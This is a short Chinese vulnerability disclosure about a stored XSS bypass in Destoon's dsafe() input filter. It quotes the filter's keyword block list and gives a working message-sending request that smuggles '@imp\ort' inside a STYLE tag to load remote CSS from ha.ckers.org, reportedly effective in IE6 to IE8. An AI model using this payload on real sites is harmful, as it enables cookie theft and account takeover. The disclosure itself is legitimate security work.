### 简要描述:
只测试了ie6,弹了个框框。
### 详细说明:
```
function dsafe($string) {
if(is_array($string)) {
return array_map('dsafe', $string);
} else {
$string = preg_replace("/\<\!\-\-([\s\S]*?)\-\-\>/", "", $string);
$string = preg_replace("/\/\*([\s\S]*?)\*\//", "", $string);
$string = preg_replace("/&#([a-z0-9]+)([;]*)/i", "", $string);
if(preg_match("/&#([a-z0-9]+)([;]*)/i", $string)) return nl2br(strip_tags($string));
$match = array("/s[\s]*c[\s]*r[\s]*i[\s]*p[\s]*t/i","/d[\s]*a[\s]*t[\s]*a/i","/b[\s]*a[\s]*s[\s]*e/i","/e[\\\]*x[\\\]*p[\\\]*r[\\\]*e[\\\]*s[\\\]*s[\\\]*i[\\\]*o[\\\]*n/i","/on([a-z]{2,})([\(|\=|\s]+)/i","/about/i","/frame/i","/link/i","/import/i","/meta/i","/textarea/i","/eval/i","/alert/i","/confirm/i","/prompt/i","/cookie/i","/document/i","/newline/i","/colon/i","/\\\x/i");
$replace = array("s<em></em>cript","da<em></em>ta","ba<em></em>se","ex<em></em>pression","o<em></em>n\\1\\2","a<em></em>bout","f<em></em>rame","l<em></em>ink","im<em></em>port","me<em></em>ta","text<em></em>area","e<em></em>val","a<em></em>lert","/con<em></em>firm/i","prom<em></em>pt","coo<em></em>kie","docu<em></em>ment","new<em></em>line","co<em></em>lon","\<em></em>x");
return preg_replace($match, $replace, $string);
}
}
```
翻译了一下。
"/script/","/data/i","/base/i","/e[\]*x[\]*p[\]*r[\]*e[\]*s[\]*s[\]*i[\]*o[\]*n/i","/on([a-z]{2,})([\(|\=|\s]+)/i","/about/i","/frame/i","/link/i","/import/i","/meta/i","/textarea/i","/eval/i","/alert/i","/confirm/i","/prompt/i","/cookie/i","/document/i","/newline/i","/colon/i","/\x/i"
然后发现了import没防\
```
action=send&typeid=-1&message%5Btouser%5D=destoon&message%5Btitle%5D=test123&message%5Bcontent%5D=<STYLE>%40imp\ort'http%3a//ha.ckers.org/xss.css'%3b</STYLE> &message%5Bcopy%5D=1&submit=+%E7%A1%AE+%E5%AE%9A+
```
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201406/27172540544c8b40b2d03baeb8ab8ed6c7f8013a.png" alt="QQ截图20140627172542.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/27172540544c8b40b2d03baeb8ab8ed6c7f8013a.png)
看sheet上是ie6到8都有效。
京公网安备 11010502034610号
暂无评论